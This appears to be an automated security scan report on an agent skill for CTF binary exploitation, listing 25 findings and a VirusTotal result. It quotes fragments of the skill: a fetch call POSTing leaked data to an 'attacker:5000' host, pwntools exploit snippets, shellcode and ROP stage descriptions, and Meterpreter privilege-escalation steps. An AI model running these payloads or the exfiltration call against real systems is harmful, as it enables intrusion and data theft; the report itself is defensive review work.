Ctf Pwn

Security checks across malware telemetry and agentic risk

Overview

This is a coherent CTF exploitation skill, but it gives an agent broad, actionable exploit and privilege-escalation guidance that should be reviewed before use.

Install only if you want agent assistance for authorized CTF, training, or isolated lab exploitation. Add explicit lab-only rules and require human approval before running exploit commands, making network callbacks, changing system files, weakening kernel protections, or attempting privilege escalation.

SkillSpector

By NVIDIA

Vulnerability Patterns

Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Rogue AgentSelf-Modification, Session Persistence

Findings (25)

Context-Inappropriate Capability

Medium

Confidence: 98% confidence
Finding: This content expands beyond binary exploitation into cross-domain offensive tradecraft by describing an XSS-to-binary exploitation bridge and command stacking. Even in a CTF-oriented skill, embedding web exploitation and shell abuse materially broadens operator capability and misuse potential beyond the declared pwn scope.

Context-Inappropriate Capability

Medium

Confidence: 97% confidence
Finding: Python sandbox escape guidance is out of scope for a binary-exploitation reference and introduces techniques for defeating language/runtime confinement. That makes the skill more dangerous because it teaches evasive breakout methods unrelated to the declared pwn purpose.

Context-Inappropriate Capability

Medium

Confidence: 99% confidence
Finding: Guidance to modify /etc/passwd or /etc/sudoers provides concrete persistence and privilege-escalation actions against real systems, not merely CTF binary exploitation. This exceeds the skill's stated scope and creates clear dual-use abuse potential for unauthorized root access.

Missing User Warnings

Medium

Confidence: 95% confidence
Finding: This section gives concrete instructions for data exfiltration to an attacker-controlled host and for command-stacking to bypass API controls, without any defensive framing or safeguards. In the context of an agent skill, this meaningfully increases the chance the skill could be used to facilitate unauthorized access, data theft, and post-exploitation activity.

Missing User Warnings

Medium

Confidence: 99% confidence
Finding: This section provides concrete, actionable exploit instructions for arbitrary read/write, GOT overwrite, libc leakage, and spawning a shell, without any safety framing, restriction guidance, or defensive context. In an agent skill, such content materially enables offensive misuse by giving step-by-step procedures and code that can be reused against real binaries, not just analyzed abstractly.

Missing User Warnings

Medium

Confidence: 100% confidence
Finding: The remainder of the file contains numerous end-to-end exploitation workflows covering sandbox escape, stack/heap corruption, ROP, inherited FD secret theft, shellcode construction, and code-signing bypass. Because it includes implementation details, payload structure, and operational advice across many vulnerability classes, it substantially increases the skill's capability for real-world offensive exploitation beyond benign CTF explanation.

Missing User Warnings

High

Confidence: 99% confidence
Finding: This file is an operational exploitation guide, not just high-level theory: it includes step-by-step instructions, code, payload construction, shell spawning, privilege escalation, CFG/DEP/ASLR bypasses, and persistence-oriented process launching. In the context of an agent skill, this materially enables offensive actions against real systems without any safety boundaries, warnings, or scoping to authorized lab/CTF-only use.

Missing User Warnings

Medium

Confidence: 98% confidence
Finding: This file is an operational exploit playbook containing step-by-step weaponized guidance, shellcode, ROP/FSOP chains, sandbox and seccomp bypasses, and command-execution patterns without any gating, safety framing, or clear restriction to controlled lab environments. In an agent skill context, this materially increases misuse risk because the content can directly enable exploitation of real systems rather than merely describing security concepts at a high level.

Missing User Warnings

Medium

Confidence: 98% confidence
Finding: This file is a how-to guide for advanced exploitation techniques, including seccomp bypasses, UAF exploitation, ret2dlresolve, kernel exploitation patterns, and shellcode/ROP construction, yet it provides no safety boundaries, authorization requirements, or warning against use on non-consensual targets. In the context of an agent skill, this materially increases dual-use risk because it can directly assist offensive operations rather than merely describing concepts at a high level.

Missing User Warnings

High

Confidence: 96% confidence
Finding: This section gives concrete kernel exploitation and privilege-escalation bypass instructions, including KPTI bypass methods such as signal-handler recovery, modprobe_path overwrite, and core_pattern abuse. Even in a CTF context, these are directly transferable to real systems and are presented operationally without prominent safety boundaries, lab-only constraints, or misuse warnings.

Missing User Warnings

High

Confidence: 98% confidence
Finding: These instructions tell the user to modify initramfs and disable kernel hardening controls such as kptr_restrict, dmesg_restrict, and privilege dropping, specifically to preserve root and expose sensitive symbol/address information. That materially lowers system security and facilitates kernel exploit development and post-exploitation, with no clear warning that this should occur only in disposable, isolated test environments.

Missing User Warnings

High

Confidence: 96% confidence
Finding: This section gives concrete, actionable instructions for a destructive kernel exploitation technique that modifies read-only file-backed pages and culminates in executing an attacker-controlled script as root, but it omits any warning that the technique can corrupt binaries, destabilize the system, and permanently damage the challenge environment. In a pwn skill focused on exploitation, this context makes the content more dangerous because it is directly aligned with offensive use and is presented as a practical recipe rather than high-level theory.

Missing User Warnings

Medium

Confidence: 91% confidence
Finding: This section explicitly recommends a kernel panic-based leak technique without warning that it intentionally crashes the kernel and can destroy runtime state or interrupt services. Although framed for CTF use, the surrounding skill is an exploitation guide, so omission of crash-risk guidance materially increases the chance of misuse or accidental damage in real environments.

Missing User Warnings

High

Confidence: 98% confidence
Finding: This file is an exploitation playbook for Linux kernel privilege escalation, including disabling mitigations, building kernel ROP chains, leaking canaries/KASLR, and overwriting modprobe_path/core_pattern to execute attacker-controlled code as root. In a CTF-oriented skill this may be educational, but as an agent skill it materially enables offensive actions without any safety boundary, scope limitation, or warning, so the content is dangerous as-is.

Missing User Warnings

Medium

Confidence: 94% confidence
Finding: This section explicitly instructs how to spawn an interactive shell with execve/system-style ROP chains and then run post-exploitation commands such as `id` and `cat /flag*`. In a skill that can be operationalized by an agent, this goes beyond abstract education and provides directly usable offensive tradecraft without an explicit safety boundary or warning, increasing misuse risk.

Missing User Warnings

High

Confidence: 99% confidence
Finding: This section gives explicit, actionable instructions to abuse a root-running CUSE/FUSE backdoor to change permissions on /etc/passwd, replace its contents, and obtain root access. Even in a CTF context, the material directly enables privilege escalation and destructive modification of critical authentication files, with no safety boundaries or warnings about system damage.

Missing User Warnings

High

Confidence: 99% confidence
Finding: This passage recommends targeting /etc/passwd, /etc/shadow, and /etc/sudoers to gain root, which is concrete guidance for tampering with authentication and authorization controls. That crosses from educational vulnerability description into directly usable privilege-escalation tradecraft applicable outside lab environments.

External Transmission

Medium

Category: Data Exfiltration
Content: // Stage 1: trigger heap commands, exfiltrate leak var res = await fetch("/api/canvas/get/1"); var data = await res.json(); await fetch('http://attacker:5000/', { method: 'POST', mode: 'no-cors', body: JSON.stringify({"pixels": btoa(JSON.stringify(data.pixels))}) });
Confidence: 99% confidence
Finding: fetch('http://attacker:5000/', { method: 'POST'

Instruction Override

High

Category: Prompt Injection
Content: **Alternative approach:** XOR shellcode with existing `.text` bytes, compute which bits differ, flip each one, then redirect execution to the shellcode location. **Key insight:** A single-bit-flip primitive becomes arbitrary code execution through cumulative modifications. Each flip changes one instruction or operand, and returning to the function start enables unlimited flips. Priority targets: (a) stack unwinding instructions (control flow hijack), (b) existing branch instructions (bypass security checks), (c) `mprotect` arguments (change memory permissions), (d) size parameters (expand read buffers). ---
Confidence: 95% confidence
Finding: bypass security

Self-Modification

High

Category: Rogue Agent
Content: **Exploit structure:** 1. Use `pop` instructions to adjust rsp to a predictable memory bucket (~1/16 probability due to ASLR) 2. Seed specific stack values for `pop sp` instruction (pivots to controlled location) 3. Place `syscall` gadget disguised as `push fs` with self-modifying byte mutation 4. Use `read(0, stage2_buf, size)` syscall to load stage 2 5. Stage 2 contains interactive shell code
Confidence: 97% confidence
Finding: self-modify

Self-Modification

High

Category: Rogue Agent
Content: **Alternative approach:** XOR shellcode with existing `.text` bytes, compute which bits differ, flip each one, then redirect execution to the shellcode location. **Key insight:** A single-bit-flip primitive becomes arbitrary code execution through cumulative modifications. Each flip changes one instruction or operand, and returning to the function start enables unlimited flips. Priority targets: (a) stack unwinding instructions (control flow hijack), (b) existing branch instructions (bypass security checks), (c) `mprotect` arguments (change memory permissions), (d) size parameters (expand read buffers). ---
Confidence: 94% confidence
Finding: bypass security check

YARA rule 'exploit_framework': Exploit framework components and payloads [hacktools]

High

Category: YARA Match
Content: exe = ELF('./revenant') io = process('./revenant') # Calculate iterations needed to overflow shadow_stack_ptr to username shadow_stack_addr = exe.symbols["shadow_stack"] username_addr = exe.symbols["username"] iterations = (username_addr - shadow_stack_addr) // 8 # 512
Confidence: 91% confidence
Finding: from pwn import; from pwn import

YARA rule 'exploit_framework': Exploit framework components and payloads [hacktools]

High

Category: YARA Match
Content: ```python # Convert board to coordinates and feed to binary import re from pwn import * rows = open('board.txt').read().split('\n') coords = []
Confidence: 88% confidence
Finding: from pwn import; from pwn import; from pwn import

YARA rule 'c2_framework_indicators': Command-and-control framework indicators (Cobalt Strike, Metasploit, Sliver, etc.) [malware]

Critical

Category: YARA Match
Content: ## SeDebugPrivilege to SYSTEM (RainbowTwo HTB) Exploits `SeDebugPrivilege` to escalate to SYSTEM by migrating into a SYSTEM-owned process. The privilege allows debugging any process, even if listed as "Disabled" -- Meterpreter enables it automatically before use. **Steps:** 1. Upload Meterpreter payload and obtain a session
Confidence: 98% confidence
Finding: Meterpreter; Meterpreter; meterpreter; meterpreter; Meterpreter

YARA rule 'exploit_framework': Exploit framework components and payloads [hacktools]

High

Category: YARA Match
Content: ```python from pwn import * # r15 is the field immediately before rdi in the sigframe # rdi = pointer to "/bin/sh" = 0x2f9fb0 → bytes [B0, 9F, 2F, ...] # B0, 9F are UTF-8 continuation bytes (10xxxxxx) — invalid as sequence start # Solution: set r15's last byte to 0xE0 (3-byte UTF-8 leader)
Confidence: 98% confidence
Finding: from pwn import; from pwn import; from pwn import; from pwn import; from pwn import

VirusTotal

1/64 vendors flagged this skill as malicious, and 63/64 flagged it as clean.

View on VirusTotal